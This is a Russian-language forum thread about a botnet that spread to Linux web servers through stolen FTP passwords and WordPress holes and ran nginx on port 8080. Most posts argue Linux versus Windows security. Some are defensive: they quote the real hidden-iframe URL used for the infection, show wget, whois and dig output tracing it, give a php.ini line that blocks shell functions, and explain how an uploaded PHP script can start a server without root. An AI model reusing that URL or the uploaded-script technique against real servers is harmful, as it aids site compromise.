>В общем сказка о "неуязвимости" Линукс закончилась, с первым бонетом! А отговорки
>один-в-один повторяют слова защитников винды - мол это кривые руки, это
>админ/юзер, винда не причем тут. Никто не любит правды... ;)Сударь, мелко мыслите. Вы виртуальныесервки видели когда-нибуь? Там зп деньги дают юзать такое старьё!!! Вот и имеем.
>В общем сказка о "неуязвимости" Линукс закончилась, с первым бонетом! А отговорки
>один-в-один повторяют слова защитников винды - мол это кривые руки, это
>админ/юзер, винда не причем тут. Никто не любит правды... ;)Главное горе винды - это открытые порты 137-139, 445, и т.д.
Ещё со времен Win95 кстати.
Винда по сети поражаеся именно через эти порты.А локально поражается через кривые IE и outlook.
Ну и можно вспомнить приколы с вирусом через .ani курсоры =)Те вещи, которые я указал - это недоработки именно разработчиков винды.
И от них защититься можно - включив нормальный фаерволл, запретить анимацию и т.д.
НО... что это за система, которая сама по себе дырявая, и к которой нужно что-то доставлять и донастраивать?
Для примера, попробуйте взломать свежеустановленную *nix систему.
Через какой порт вы собираетесь на неё залезть?
Какую уязвимость в графической подсистеме вы собираетесь использовать?
Про консоль вообще молчу - эффективные способы защиты от атак консоли были ещё тогда, когда windows ещё под стол пашком ходила.Вот и остается, что жутко пиарить случаи, когда к системе был доступ по однотипному паролю, или когда использовали дырку в php/wordpress.
>Главное горе винды - это открытые порты 137-139, 445, и т.д.Если быть точным то 135, 139, 445
>Ещё со времен Win95 кстати.
В 9x нету открытого 445
>>Ещё со времен Win95 кстати.
>
>В 9x нету открытого 445Да, это так.
Там хватало 135-139)
>В общем сказка о "неуязвимости" Линукс закончилась, с первым бонетом! А отговорки
>один-в-один повторяют слова защитников винды - мол это кривые руки, это
>админ/юзер, винда не причем тут. Никто не любит правды... ;)Попытка могла бы быть удачной, но слишком толсто.
Стоп, ответьте на вопрос - если вы работаете под виндой, а тут вдруг вы обнаруживаете что пользуетесь уязвимым клиентом виндовой аськи, клиентом торрента, где какой-то быдлокодер воткнул strcpy или просто в WinRAR'е вдруг обнаруживается переполнение буфера при хитро сформированном подставном файле архива - вы сразу кричите про уязвимость в винде? Или просто в этих отдельных программах?
Про уязвимость в винде. Все так говорят.
>Про уязвимость в винде. Все так говорят."В Windows нашли уязвимость! WinRar версии 1.х может вызвать у себя переполнение буфера и выпасть с сошибкой!"
Так чтоли? )
Лучше бы кто пару советов на предмет обнаружения симптомов подбросил.
Ищите процессы-долгожители, запущенные пользователями.
сказано ж, порт 8080
>Лучше бы кто пару советов на предмет обнаружения симптомов подбросил.Очень просто:
1.Смотрим исходный код страницы, отдаваемой клиенту.
2.Наблюдаем, что он обрамлен в ifraime.
3.В самом конце находим, что есть еще один iframe.
4.Внутри последнего видим
src="http://pogromski.is-a-geek.org:8080/ts/in.cgi?open10" width=981 height=0 style="visibility: hidden"Вот это оно.
Внешне инкапсуляция в iframe как правило не проходит бесследно - портится дизайн.
BTW: вот эту фигню наблюдаю прямо сейчас на сайте клиента ХХХ (я сисадмин сетки офиса), хостящегося у провайдера УУУ. сайт работал под NetCat. дир позвонил только что - а что это с нашим сайтом... а вот, это самое и случилось...
>src="http://pogromski.is-a-geek.org:8080/ts/in.cgi?open10" width=981 height=0 style="visibility: hidden"А вот что дальше
wget http://pogromski.is-a-geek.org:8080/ts/in.cgi?open10
--13:21:37-- http://pogromski.is-a-geek.org:8080/ts/in.cgi?open10
=> `in.cgi?open10'
Распознаётся pogromski.is-a-geek.org... 195.34.25.36
Устанавливается соединение с pogromski.is-a-geek.org|195.34.25.36|:8080... соединение установлено.
Запрос HTTP послан, ожидается ответ... 302 Found
Cookie, пришедшие из pogromski.is-a-geek.org, попытались установить домен в traffcount.cn
Cookie, пришедшие из pogromski.is-a-geek.org, попытались установить домен в traffcount.cn
Cookie, пришедшие из pogromski.is-a-geek.org, попытались установить домен в traffcount.cn
Адрес: http://lentim.myvnc.com:8080/index.php [переход]
--13:21:37-- http://lentim.myvnc.com:8080/index.php
=> `index.php'
Распознаётся lentim.myvnc.com... 74.52.109.74
Устанавливается соединение с lentim.myvnc.com|74.52.109.74|:8080... соединение установлено.
Запрос HTTP послан, ожидается ответ... 200 OK
Длина: 0 [text/html][ <=> ] 0 --.--K/s
13:21:39 (0.00 B/s) - `index.php' сохранён [0/0]
>>src="http://pogromski.is-a-geek.org:8080/ts/in.cgi?open10" width=981 height=0 style="visibility: hidden"Дальше смотрим
whois is-a-geek.org | grep -i dyndns
Registrant Name:DynDNS Hostmaster
Registrant Email:hostmaster@dyndns.com
Admin Name:DynDNS Hostmaster
Admin Email:hostmaster@dyndns.com
Tech Name:DynDNS Hostmaster
Tech Email:hostmaster@dyndns.com
Name Server:NS.DYNDNS.ORG
Name Server:NS2.DYNDNS.ORG
Name Server:NS3.DYNDNS.ORG
Name Server:NS4.DYNDNS.ORG
Name Server:NS5.DYNDNS.ORGТут уже все должно быть ясно ;) Управлялка ботнета может активироваться по графику, регистрируя любой хост, как текуший мастер.
>>>src="http://pogromski.is-a-geek.org:8080/ts/in.cgi?open10" width=981 height=0 style="visibility: hidden"А вот и он - "северный олень" ;)))
dig pogromski.is-a-geek.org | grep ^pog
pogromski.is-a-geek.org. 60 IN A 195.34.25.36Короткоживущая (60 сек) запись в ДНС указывает на сетку $(whois 195.34.25.36 | grep ^netname), в которой расположен мастер ботнета. Всем желающим звонить по телефону $(whois 195.34.25.36 | grep ^phone) и спрашивать $(whois 195.34.25.36 | grep ^person)
>Лучше бы кто пару советов на предмет обнаружения симптомов подбросил.А теперь могу подсказать, как с этим можно бороться средствами пользователя. Проблема на стороне хостинга и тут уже ничего не поделат, если хостер ССЗБ. Взлом сайта производиться через ftp. Ботнет меняет пароль ftp доступа беквально в течении 30 минут. Затем по логам ftp можно засечь с каких ip и что конкретно загружается (причем, оно сначала даунлодиться на ботнет, а потом грузится) - переписываются корневые индексы. Тут собственно весь ботнет можно и подрубить по найденным в логах ip - просто перекрыть их в файрволе ;) Ну, а пользователям предлагаю удалить все ftp-бюжеты и перейти на ssh.
>Лучше бы кто пару советов на предмет обнаружения симптомов подбросил.ps, аудит. но, конечно, первым делом мозг, а то никакие инструменты не помогут.
Такое впечатление, как будто везде был установлен бинарный пакет Apache[+Mysql+Php]+Троян скаченный с какого-то доброго сайта.
А сайт Apache недавно взломали...
Сперли SSH-ключ, вот и взломали.
Человек, наверное, имел ввиду, что подкинули туда заразу.
сперев ключ залогинились и засплойтив федору получили неплохие права, ага ;)
Да, линукс не при чем, но почему-то ботнет крутится на линуксе. Админы указывают на вебмастеров, что поставили дырявый wordpress, а вебмастерам по большому без разницы, не их задача заботится о безопастности серверов и обновлять этот самый вордпресс. Вот и выходит, что юниксовый хост (и линукс и freebsd и любая другая) ломается на _раз_ залитым скриптом через дыру в веб приложении. Просто некоторые почему-то думают, поставил линукс и все дальше думать не надо. А SELinux обычно мешает, поэтому вырубается в числе первых, привет гентуводам.Ботнет может быть и первый, но количество заломанных веб серверов через залитые скрипты думаю что сотни тысяч. Пароли на раз тырятся через сохраненные сессии в FAR и TotalComander. Покажите мне вебмастеров под линуксом, все на винде сидят.
"Покажите мне вебмастеров под линуксом" - например я работаю с сайтами только через линукс. Просто проще, чем работать на винде, но делать сайт под никсовый хостинг."Пароли на раз тырятся через сохраненные сессии в FAR и TotalComander" - при чем тут линукс? или нынче модно их под вайном пускать? :)
"но почему-то ботнет крутится на линуксе" - ботнет наверняка работает и на виндовых серверах. Просто они не слишком популярны и такой хостинг только под дотнетчиков пользуют. Основная проблема в сабже - кривые популярные php-движки, крайне востребованные у виндузятнегов. И безопасность у таких сайтов как положено на винде - на честного человека.
так всегда
когда нет аргументов, проще зачистить тему
> Покажите мне вебмастеров под линуксом, все на винде сидят.Не все, но Вы правы. Мучаются, ламаються, изворачиваються, но сидят под виндой и корчат из себя великого профи.
>[оверквотинг удален]
>этот самый вордпресс. Вот и выходит, что юниксовый хост (и линукс
>и freebsd и любая другая) ломается на _раз_ залитым скриптом через
>дыру в веб приложении. Просто некоторые почему-то думают, поставил линукс и
>все дальше думать не надо. А SELinux обычно мешает, поэтому вырубается
>в числе первых, привет гентуводам.
>
>Ботнет может быть и первый, но количество заломанных веб серверов через залитые
>скрипты думаю что сотни тысяч. Пароли на раз тырятся через сохраненные
>сессии в FAR и TotalComander. Покажите мне вебмастеров под линуксом, все
>на винде сидят.Просто есть дыры в ПО, а есть дыры в ОС.
Если дыры в ПО, то их можно обойти настройками, chroot'ом, jail'ом, SElinux'ом наконец.
А если дыры в ОС, а особенно в закрытой, то иногда остается только молиться и ждать заплатки от разработчиков.В данном случае были дыры в ПО.
А Windows не любят больше из за дыр в ОС)
[quote]Да, линукс не при чем, но почему-то ботнет крутится на линуксе. Админы указывают на вебмастеров, что поставили дырявый wordpress, а вебмастерам по большому без разницы, не их задача заботится о безопасности серверов и обновлять этот самый вордпресс.[/quote]
Тупой и бесполезный троллинг.
Дураку дай хоть виндовс хоть линукс, все сломает. Дурак как правило выбирает виндовс, потому что там есть возможность меньше извилинами шевелить.
Умный человек прочитав этот пост подумает чего ему нужно сделать чтобы прикрыть эту уязвимость на своем сервере, а судя по описанию для этого не нужно ждать никаких патчей, просто нужно иметь голову и руки не из жопы, дурак начнет тролить.
>> Админы указывают на вебмастеров, что поставили дырявый wordpress, а вебмастерам по большому без разницы, не их задача заботится о безопастности серверов и обновлять этот самый вордпресс.ААхахаха, ЛОЛ. Да, это админы должны патчить вордпрессы. То есть на сервере хостинга 100 сайтов с вордпрессом (допустим), на каждом свои извращённые плагины и админ должен всё бросить и обновить 100 вордпрессов, а потом проверить совместимость плагинов с новой версией? Что вы такое курите вообще?
Если вебмастерам без разницы, то их сайт заражается, а админы просто блокируют его нафиг. Вот так дела делаются в нашем мире, уважаемый.
>все дальше думать не надо. А SELinux обычно мешает, поэтому вырубается
>в числе первых, привет гентуводам.ага. «мешает». а мозг таким оключателям череп не распирает, интересно? такие же и UAC отрубают, а потом пищат, что «троянов нахватались». и сидят под админом/рутом, «патамуша пад прастым юзирам ниудобна, тварь я дражащия али права имею?!»
Linux? Казалось бы, причем тут ядро?
боюсь, что само слово 'Linux' - это уже сто лет как не ядро. это название достаточно разлапистого и, что греха таить, популярного в своих кругах бренда. подвод же всех под один монастырь - это лишь плата за популярность.// wbr
>... и, что греха таить, популярного в своих кругах бренда.И, что греха таить, Linux, это что-то особенное и недостижимое для многих, многих, многих... в кругах виновса :))) И этим беднягам остается только огрызаться на недостижимую ОС.
>И, что греха таить, Linux, это что-то особенное и недостижимое для многих, многих, многих... в кругах виновса :))) И этим беднягам остается только огрызаться на недостижимую ОС.И, что греха таить, для многих из тех, кому кажется, что они постигли Linux, остаются непостижимыми многие многие другие ОСи. Эти бедняги способны сравнивать Linux только с Виндами, находясь при этом под воздействием виндовых же стереотипов. Поэтому им и кажется, что Linux самая лучшая в мире ОСь.
>И, что греха таить, для многих из тех, кому кажется, что они
>постигли Linux, остаются непостижимыми многие многие другие ОСи. Эти бедняги способны
>сравнивать Linux только с Виндами, находясь при этом под воздействием виндовых
>же стереотипов. Поэтому им и кажется, что Linux самая лучшая в
>мире ОСь.Ну естественно, есть и такие, но это ведь нас с Вами не касается ;)))
>На входящих в ботнет хостах, в дополнение к основному http-серверу, на 8080 порту запущен дополнительный http-сервер nginxНикому не кажется, что это полный бред?
Пеар никому не известной конторы.
>>На входящих в ботнет хостах, в дополнение к основному http-серверу, на 8080 порту запущен дополнительный http-сервер nginx
>
>Никому не кажется, что это полный бред?
>
>Пеар никому не известной конторы.Может быть... Когда во дворе рядом с деревянным домом вдруг появляется многоэтажка - это кажется невозможным.
Один сервер, специально настроенный на раздачу "заразы" не может быть ботнетом по определению.
Меня другое удивляет. Неужели брызжущие слюной комментаторы не видят, что никто из отписавшихся, кроме двух, ВОООБЩЕ не боится, что на его сервере это есть?! Разве не очевидно, что то, что они говорят - правда?
>Меня другое удивляет. Неужели брызжущие слюной комментаторы не видят, что никто из
>отписавшихся, кроме двух, ВОООБЩЕ не боится, что на его сервере это
>есть?! Разве не очевидно, что то, что они говорят - правда?
>ну почему же никто? Боимся. Я проверил на своих.
Я же говорю - кроме двоих отписавшихся все уверены в своих серверах.
А значит, кривые руки. Ну разве случайно забытый ключ от бронированной двери рядом с бронированной дверью означает, что дверь плохая?
А вы уверены, что у многих комментаторов под опекой сервер с WordPress'ом?
У меня, например, он не используется. Однако проверил, какие страницы выдает мой сайт.
iframe, как и положено, один - битриксовский для внутреннего использования ;)
>Меня другое удивляет. Неужели брызжущие слюной комментаторы не видят, что никто из
>отписавшихся, кроме двух, ВОООБЩЕ не боится, что на его сервере это
>есть?! Разве не очевидно, что то, что они говорят - правда?а чего бояться-то? веб-сервак сидит себе в отдельной группе под отдельным юзером. все ненужные права файрволом прикрыты. закачаные бинари ему особо позапускать не удастся. к тому же в кроне сидит спецназ и мониторит систему, поднимая вопль и расчехляя пушку, если вдруг мимо воробей пролетел. и, конечно, никакого ftp, только sftp. и смены паролей. и ещё куча всего.
так что чего бояться, если всё под контролем?
s/ненужные права/ненужные порты/selffxd.
>Никому не кажется, что это полный бред?
>Пеар никому не известной конторы.Не знаю, не знаю, не въехал в суть, но слишком подозрительно сделан акцент на nginx
nginx есть во многих дистрибутивах готовый, его можно скачать - он маленький, и конфигурировать его легко, и нагрузку незаметно держит, и почти всегда всё равно запущен - незаметен в списке процессов. В общем, для данного использования идеальный сервер.
одмины нынче не знают про firewall ?
"Поражение троянским ПО одной из клиенских _windows_-машин"вообще всё это безобразие - продолжение темы http://it.slashdot.org/story/09/07/13/142210/RIP-FTP , с той лишь разницей что какой-то "специалист в безопасности" (понятно должно быть - безопасности чего и где) решил посчитать количество упоминания слова "linux" в идентификаторе веб-сервера и потыкать пальчиком.
но кого это волнует когда можно просто содрать новость со slashdot и покормить местных троллей? один вон уже лопается
Загрузка malware через ворованные FTP пароли уже года 3-4 как прослеживается. Но с тем, что представлено сейчас разница огромная, если раньше просто закачивали на сайты затрояненные html страницы, то теперь грузят на сервер часть кода для обеспечения работы ботнета, т.е. переносится функциональность с троянов на стороне клиентов, на сторону сервера. И самое важное - все это делается на автомате, без ручного участия. Меня только удивляет зачем грузить nginx, когда можно было все более красиво и незаметно через троянский PHP-скрипт устроить, и проблема с неработой на отличных от Linux системах при этом решилась бы. Хотя догадываюсь, на эти серверные точки сливается и внешний троянский трафик и запатченный nginx самое то для такой нагрузки.
>[оверквотинг удален]
>с тем, что представлено сейчас разница огромная, если раньше просто закачивали
>на сайты затрояненные html страницы, то теперь грузят на сервер часть
>кода для обеспечения работы ботнета, т.е. переносится функциональность с троянов на
>стороне клиентов, на сторону сервера. И самое важное - все это
>делается на автомате, без ручного участия. Меня только удивляет зачем
>грузить nginx, когда можно было все более красиво и незаметно через
>троянский PHP-скрипт устроить, и проблема с неработой на отличных от Linux
>системах при этом решилась бы. Хотя догадываюсь, на эти серверные точки
>сливается и внешний троянский трафик и запатченный nginx самое то для
>такой нагрузки.Главное - отработать технологию. Улучшить можно и потом. В данном случае важным элементом является построение ботнета на линуксе, использование новой технологии, демонстрация что "оно работает", демонстрация того что линукс - это неуловимый джо.
Это демонстрация того, что можно легко использовать дыры в php. Непонятно одно - всё-таки сервера администрируются, в отличии от пользовательских машин, и паразитная активность должна быстро замечаться, а почему-то не обнаруживается. Возможно, время жизни аких ботнетов или их размер сильно завышены.
>Это демонстрация того, что можно легко использовать дыры в php. Непонятно одно
>- всё-таки сервера администрируются, в отличии от пользовательских машин, и паразитная
>активность должна быстро замечаться, а почему-то не обнаруживается. Возможно, время жизни
>аких ботнетов или их размер сильно завышены.Админ админу рознь, тупых и ленивых увальней и в линуксовом саппорте хватает, а VPS нынче может позволить себе практически каждый.
>- всё-таки сервера администрируютсядадада, Firefox'ом, мы знаем.
>[оверквотинг удален]
>>делается на автомате, без ручного участия. Меня только удивляет зачем
>>грузить nginx, когда можно было все более красиво и незаметно через
>>троянский PHP-скрипт устроить, и проблема с неработой на отличных от Linux
>>системах при этом решилась бы. Хотя догадываюсь, на эти серверные точки
>>сливается и внешний троянский трафик и запатченный nginx самое то для
>>такой нагрузки.
>
>Главное - отработать технологию. Улучшить можно и потом. В данном случае важным
>элементом является построение ботнета на линуксе, использование новой технологии, демонстрация что
>"оно работает", демонстрация того что линукс - это неуловимый джо.То есть, если веб сервер с дырявым wordpress работает на Windows, то можно не бояться? =)
Ссылки к новости:
OpenNews: На суперкомпьютере MegaTux будет запущено 1 млн. копий Wine
это там бот-нет "испытывают"?:)
да. и изучают поведение вирусов.
Из новости можно сделать вывод:
Безопасность зависит от многих факторов.
Linux - один из них.
Дырявый wordpress - точно такой же фактор в этом списке =)И если уделять внимание безопасности, то уделять всем факторам.
Одним постоянным обновлением ядра Linux тут не обойдешься.А вообще получается, что репутация Linux (и вообще *nix), как защищенной системы, страдает.
И страдает именно изза дырявых сервисов, которые на ней запущены.
Поэтому не следить за сервисами - это даже рискованнее, чем не обновлять систему.
Скрипткиддисы и боты чаще используют уязвимости сервисов, чем системы.
>А вообще получается, что репутация Linux (и вообще *nix), как защищенной системы, страдает.Тут ещё одно. Линукс, в отличии от Windows, содержит в любом дистрибутиве массу интересных программ - кирпичиков, в том числе nginx. Данный случай показывает, что на линуксе можно очень простым способом сделать очень производительный троянский компьютер. Code Red умел только заражать всё вокруг, новый способ производства зомбированных компьютеров позволяет очень короткими скриптовыми языками добиться выдачи сотен страниц в секунду, не создавая на компьютер заметной нагрузки.
Линукс показал себя (что неудивительно) более совершенным оружием, что по идее должно налагать дополнительную ответственность на его пользователей. А что на практике - код пишут программисты-phpшники, многие из которых даже не поступили в институт, не имеющие никаких представлений о безопасности и считающих себя непогрешимыми. Надо ждать второй волны троянца, уже эксплуатирующего уязвимости в нескольких CMS. Наступают интересные времена... Wordpress пал, Joomla, Drupal - следующие. Если так и будет, то на опенсурс может покатиться огромная бочка с дерьмом - тот же Drupal не имеет механизма автоматического установления патчей, и похожая ситуация и в других системах.
В общем, линукс-сообщество вовремя не опомнится и не начнёт уделять безопасности больше внимания, наступит линуксокапец.
Кстати, недавно где-то пролетало обсуждение - ставить или нет файрвол на сервер. Наверно, теперь придётся ставить и разрешать только то что не запрещено в обязательном порядке.
> новый способ производства зомбированных компьютеров позволяет очень короткими скриптовыми языками добиться выдачи сотен страниц в секундуДля того, что бы это было опасно нужно, что бы за этими страничками к заражённому компьютеру обращались.
> В общем, линукс-сообщество вовремя не опомнится и не начнёт уделять безопасности больше внимания, наступит линуксокапец.
Если покинуть криокамеру, можно заметить, что есть и SELinux, и chroot, и ещё несколько вариантов ограничения функционала для некоторых пользователей/приложений. О безопасности должны думать те, кто эксплуатирует ПО, а разработчики уже давно "чешутся".
>Если покинуть криокамеру, можно заметить, что есть и SELinux, и chroot, и
>ещё несколько вариантов ограничения функционала для некоторых пользователей/приложений. О безопасности должны
>думать те, кто эксплуатирует ПО, а разработчики уже давно "чешутся".Если подумать головой, chroot не поможет от описанного типа внедрения ботнет-агентов. Если ограничивть функционал, тогда администрировать сервера будет дорого.
Разработчики не чешутся. Пример - сколько CMS'ок перешли на использование переменных в SQL запросах (binding placeholders). А половина если не больше проблем отсюда и идёт.
>Кстати, недавно где-то пролетало обсуждение - ставить или нет файрвол на сервер.
>Наверно, теперь придётся ставить и разрешать только то что не запрещено
>в обязательном порядке.Ну там же было сказано, что целесообразность фаервола надо оценивать в каждом конкретном случае. На веб-серверах ставить обязательно.
Я вам производительный отдачик вирусов под любой ОС сделаю, хоть под DOS (если под него найдется веб сервер) =)Конечно, что в Linux есть много программ, которые можно использовать со злым умыслом.
Их и в windows достаточно.
DDoS можно сделать даже простым telnet'ом.
Например, запустить его на 10 000 машинах и подключаться к 80 порту одного сервера)
Поэтому бороться с этим уменьшением функционала не получится.
А ответственность есть всегда.
Но ответственность есть за конкретные действия, а не за использование потенциально опасных средств.
>хоть под DOS
>(если под него найдется веб сервер) =)был, был какой-то. и даже не один. гуглить лень. %-)
>Тут ещё одно. Линукс, в отличии от Windows, содержит в любом дистрибутиве
>массу интересных программ — кирпичиков, в том числе nginx.десять минут изо всех сил искал у себя в слаке ngnix. не нашёл. аффтар — врун.
Отключите в винде все сервисы и будет вам безопасная нафик не нужная ось :)
Сабж свидетельствует о том, что Линукс становится основной платформой для веб-серсиов.
Взломан ворд-пресс, а не ОС.
Винузятники, пейте яд.
Ага на Линукс локальных уязвимостей не существует, удаленных тоже бай дизайн. А если существуют то это кривые руки. Treo должен завидовать :)) ыыы
"Паразиты без маски" (с)
Этот WordPress настолько дыряв, что дает получить права рута для установки/запуска ngnix и открытия порта 8080?
>Этот WordPress настолько дыряв, что дает получить права рута для установки/запуска ngnix
>и открытия порта 8080?Не только вордпресс. Кривой вебмастер - самая большая проблема. Достаточно просто увести у него пароль от фтп и залить СВОИ скрипты независимо от того, Вордпресс там у него, Друпал или вообще пустой веб-сайт с одной статической HTML-страничкой.
Вряд ли украденный пароль фтп-аккаунта дает полномочия, с которыми можно установить, сконфигурироваль и запустить левый сервис, фаирвол переконфигурировать и т.д. Это намного страшнее, чем "залить свои скрипты" на какой-нибудь занюханный виртуал-хост.
>Вряд ли украденный пароль фтп-аккаунта дает полномочия, с которыми можно установить,
>сконфигурироваль и запустить левый сервис, фаирвол переконфигурировать и т.д. Это намного
>страшнее, чем "залить свои скрипты" на какой-нибудь занюханный виртуал-хост.Похоже, вы невнимательно читали текст заметки. Зачем фаервол переконфигурить?
Запустить левый сервис - запросто. Заливаете, например, свой cgi-скрипт, потом через http://сервер/скрипт запускаете его - и вауля, сервис работает.
>и вауля, сервис работаетот 20 до 60 секунд как правило
>>и вауля, сервис работает
>
>от 20 до 60 секунд как правилоА если создать новую группу процессов? А если в at?
>А если создать новую группу процессов? А если в at?а если устроить ярмарку и раздавать всем прохожим root-аккаунты?
дырявая ось + кривые руки, иначе не бывает
>>и вауля, сервис работает
>
>от 20 до 60 секунд как правилоЭто уже в зависимости от настроек веб сервера.
Если скрипт выдает что-то и закрывает stdout, веб сервер считает, что скрипт закончил работу)
Кроме того, всегда есть способы получить отдачу даже от этих 20 - 60 секунд.
>>и вауля, сервис работает
>от 20 до 60 секунд как правилоза это время можно до Канады добежать, не то что только понаделать форков и позапускать over 9000 программ.
Погодите, я внимательно читал текст заметки. Там написано, что дополнительно к основному http-серверу запускается дополнительный http-сервер, а именно ngnix, и именно на порту 8080. Это значит, что ngnix сначала нужно установить и сконфигуриировать. И порт 8080 открыть, если он закрыт фаирволом (а по умолчанию iptables работает почти везде).
>Погодите, я внимательно читал текст заметки. Там написано, что дополнительно к основному
>http-серверу запускается дополнительный http-сервер, а именно ngnix, и именно на порту
>8080. Это значит, что ngnix сначала нужно установить и сконфигуриировать. И
>порт 8080 открыть, если он закрыт фаирволом (а по умолчанию iptables
>работает почти везде).Если закрыт фаерволом, то всё ок. Здесь говорится про сервера, где незакрыт.
А сконфигурировать nginx - не проблема. Установить - это скопировать по фтп файлы? А как запустить - я описал выше.
>Вряд ли украденный пароль фтп-аккаунта дает полномочия, с которыми можно установить,
>сконфигурироваль и запустить левый сервис, фаирвол переконфигурировать и т.д. Это намного
>страшнее, чем "залить свои скрипты" на какой-нибудь занюханный виртуал-хост."Установить, сконфигурировать и запустить сервис" - попахивает windows-терминологией)
Если я запущу скрипт на bash , который откроет 8080 порт и будет слушать на нем соединения - это можно назвать "установить, сконфигурировать и запустить сервис"? )
bash файл - это аналог bat файла в винде.
В винде тоже можно запустить простенькую программу на 40кб, которая будет слушать порт.Запустить nginx на порту 8080 проще простого.
php скрипт копирует нужные файлы на сервер (в папку сайта) и делает fork/exec файла nginx.
Правда, это и запрещается относительно просто - монтировать раздел с noexec.Так вот.
Украденный пароль от ftp очень может дать полномочия.
Есть php скрипты, которые работают, как norton commander.
Т.е. показывают каталоги и файлы, открывают файлы в редакторе.
И даже запускают указанные файлы.
Следовательно, заливаешь такой php скрипт и дело в шляпе.
Да, все понятно теперь, спасибо за ликбез. Ясно, что линух к этим уязвимостям имеет такое же отношение, как погода к синоптикам. Все те же пхп-дырки
>Есть php скрипты, которые работают, как norton commander.
>Т.е. показывают каталоги и файлы, открывают файлы в редакторе.
>И даже запускают указанные файлы.
>Следовательно, заливаешь такой php скрипт и дело в шляпе.Вот чтобы такого не было, достаточно просто запретить в php.ini соответствующие команды:
===
disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open
;The first line disables URL-aware fopen wrappers that enable accessing URL object like files. The second one disables a lot of PHP functions:
;shows_source -- an alias of highlight_file() which provides syntax highlighting for files;
;system -- allows execution of external programs;
;shell_exec -- allow execution of commands via a shell;
;exec -- allow execution of commands;
;passthru -- similar to the exec() function, allows execution of commands;
;phpinfo -- outputs PHP information that could be used by potential intruders;
;popen -- opens a pipe to a process being executed by a certain command;
;proc_open -- similar to popen() but provides better control over command execution.
===
>Вот чтобы такого не было, достаточно просто запретить в php.ini соответствующие команды:ага. чтобы пользователь не порезался, надо оторвать ему руки. и ноги — на всякий случай.
>>Вот чтобы такого не было, достаточно просто запретить в php.ini соответствующие команды:
>
>ага. чтобы пользователь не порезался, надо оторвать ему руки. и ноги —
>на всякий случай.У вас PHP использует эти вызовы? Для чего, позвольте узнать?
Если так уж надо, то определить php_value на уровне директорий ещё никто не мешал.
>У вас PHP использует эти вызовы? Для чего, позвольте узнать?например, для рисования морды от гита. а также для многих других приятных вещей.
>Если так уж надо, то определить php_value на уровне директорий ещё никто
>не мешал.угу. на /usr/bin.
>>У вас PHP использует эти вызовы? Для чего, позвольте узнать?
>
>например, для рисования морды от гита. а также для многих других приятных
>вещей.
>Он рисует морду не в /usr/local/www/cgi-bin/?
"Многие другие приятные вещи" выбираете вы, если вы так уверены в них, то пожалуйста. Я лично PHP-шным поделкам не доверяю и стараюсь свести их количество к минимуму.
>>Если так уж надо, то определить php_value на уровне директорий ещё никто
>>не мешал.
>
>угу. на /usr/bin.open_basedir определите.
>Он рисует морду не в /usr/local/www/cgi-bin/?вообще-то он зовёт git через popen и парзит его вывод. потому что это единственный (кроме кромсания исходников git и написания ручками своей либы) метод что-то у гита взять.
>"Многие другие приятные вещи" выбираете вы, если вы так уверены в них,
>то пожалуйста. Я лично PHP-шным поделкам не доверяю и стараюсь свести
>их количество к минимуму.я тоже, потому использую только то, что сам и накарябал.
>>Он рисует морду не в /usr/local/www/cgi-bin/?
>
>вообще-то он зовёт git через popen и парзит его вывод. потому что
>это единственный (кроме кромсания исходников git и написания ручками своей либы)
>метод что-то у гита взять.Вообще-то у GIT есть cgi-модуль, которые написан на perl:
http://git.or.cz/gitwiki/Gitweb>
>я тоже, потому использую только то, что сам и накарябал.Тогда зачем вам всё это обсуждение? :)
И вообще веб-морд дофига:
http://git.or.cz/gitwiki/InterfacesFrontendsAndTools#WebInte...
>И вообще веб-морд дофига:
>http://git.or.cz/gitwiki/InterfacesFrontendsAndTools#WebInte...так у меня ж не просто stand-alone рожа. там интеграция и с багтрэком, и с викой и ещё много с чем. всё самопальное и кривое, конечно — но я и не показываю это народным массам. а для узкого круга вполне хватает.
вопрос, однако, был: «нафига обрывать юзеру руки?» а перекинулись на веб-рожи гита. %-)
>Вообще-то у GIT есть cgi-модуль, которые написан на perl:
>http://git.or.cz/gitwiki/Gitwebво-первых, он уродливый. во-вторых, он на перле. и в нулевых: он тоже зовёт гит и парзит вывод. городить вызов скрипта из скрипта? фи.
>>я тоже, потому использую только то, что сам и накарябал.
>Тогда зачем вам всё это обсуждение? :)а я в промежутках между отладкой сюда пишу. закурил сигарету, попил кофию, посра... посрамил оппонентов. %-)
>Этот WordPress настолько дыряв, что дает получить права рута для установки/запуска ngnix
>и открытия порта 8080?Чтобы nginx запустился, его не нужно "устанавливать".
Достаточно положить и запустить с нужным конфигом.
Чтобы открыть порт 8080, тоже прав рута не надо.Все сводится к "можно много чего сделать и без рута", если не настроены ограничения.
Я слишком усложнил себе жизнь, сравнив этот nginx с апаче, а оно как томкет оказывается.
А еще можно купить в контору хороший сейф, раздать ключи сотрудникам и при пропаже денег заявить на изготовителя этого сейфа.Ждем массового паломничества на Win-сервера.
>А еще можно купить в контору хороший сейф, раздать ключи сотрудникам и
>при пропаже денег заявить на изготовителя этого сейфа.
>
>Ждем массового паломничества на Win-сервера.То есть на виндовых серверах wordpress резко становится сверхзащищенным? =)
>То есть на виндовых серверах wordpress резко становится сверхзащищенным? =)Еще каким! Когда есть винсервер - зачем какая-то мелочь, вроде вордпресса? ;-)
>>То есть на виндовых серверах wordpress резко становится сверхзащищенным? =)
>
>Еще каким! Когда есть винсервер - зачем какая-то мелочь, вроде вордпресса? ;-)
>Ну я как бы не спорю)
Просто тут народ на фразу "поломали wordpress на linux" сразу реагируют "ага, поломали linux!".
>сразу реагируютЭто говорит о популярности Linux. И почему бы им просто не перейти на нее? А кому нужны более веские аргументы, пожалуйста: вы сэкономите средства, как свои (конторы, семьи, друзей и пр.), так и страны в целом. Опять же, зачастую можно услышать фразы, типа "надо делать работу", "некогда заниматься ерундой"... ИМХО: человек обязан развиваться и учиться всю жизнь. Иначе будут забываться даже нужные окна для проставления галочек.
Прочитал споры о виндовс/линух, имею смелость предположить, что на виндах этот ботнет не поднимают по простой причине - винда не справляется с нагрузкой )))
>Прочитал споры о виндовс/линух, имею смелость предположить, что на виндах этот ботнет
>не поднимают по простой причине - винда не справляется с нагрузкойСкорее - на винду не ставят WordPress, так как она и с этой-то нагрузкой не справляется ;)
>Прочитал споры о виндовс/линух, имею смелость предположить, что на виндах этот ботнет
>не поднимают по простой причине - винда не справляется с нагрузкой
>)))Почему не справляется? Под windows nginx какой-то другой?
>>Прочитал споры о виндовс/линух, имею смелость предположить, что на виндах этот ботнет
>>не поднимают по простой причине - винда не справляется с нагрузкой
>>)))
>
